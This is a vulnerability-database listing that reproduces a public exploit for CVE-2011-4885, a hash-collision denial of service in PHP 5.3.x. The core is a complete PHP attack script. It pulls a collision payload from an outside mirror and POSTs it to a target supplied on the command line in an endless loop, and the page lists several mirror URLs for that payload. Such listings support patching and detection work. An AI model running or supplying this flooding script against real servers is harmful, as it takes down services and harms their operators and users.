Lucene search

PHP 5.3.8 - Hashtables Denial of Service

🗓️ 01 Jan 2012 00:00:00Reported by infodoxType

exploitpack👁 74 Views

PHP 5.3.8 Hashtables Denial of Service vulnerability - CVE-2011-488

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 199
Tenable Nessus	F5 Networks BIG-IP : PHP vulnerability (K13588)	10 Oct 201400:00	–	nessus
Tenable Nessus	RHEL 4 / 5 / 6 : php (RHSA-2012:0093)	3 Feb 201200:00	–	nessus
Tenable Nessus	CentOS 5 : php53 (CESA-2012:0092)	3 Feb 201200:00	–	nessus
Tenable Nessus	CentOS 5 / 6 : php / php53 (CESA-2012:0019)	12 Jan 201200:00	–	nessus
Tenable Nessus	PHP 5.3.9 'php_register_variable_ex()' Code Execution (intrusive check)	20 Feb 201200:00	–	nessus
Tenable Nessus	Scientific Linux Security Update : php53 and php on SL5.x, SL6.x i386/x86_64 (20120111)	1 Aug 201200:00	–	nessus
Tenable Nessus	PHP 5.3.9 'php_register_variable_ex()' Code Execution (banner check)	3 Feb 201200:00	–	nessus
Tenable Nessus	Fedora 16 : maniadrive-1.2-32.fc16.1 / php-5.3.9-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.1 (2012-0504)	20 Jan 201200:00	–	nessus
Tenable Nessus	FreeBSD : php -- multiple vulnerabilities (d3921810-3c80-11e1-97e8-00215c6a37bb)	12 Jan 201200:00	–	nessus
Tenable Nessus	Amazon Linux AMI : php (ALAS-2012-37)	4 Sep 201300:00	–	nessus

  

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service
Exploit
 # Date: 1/1/12
 # Author: infodox
 # Software Link: php.net
 #
Version: 5.3.*
 # Tested on: Linux
 # CVE : CVE-2011-4885 

Exploit
Download -- http://infodox.co.cc/Downloads/phpdos.txt 

<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

01 Jan 2012 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.8947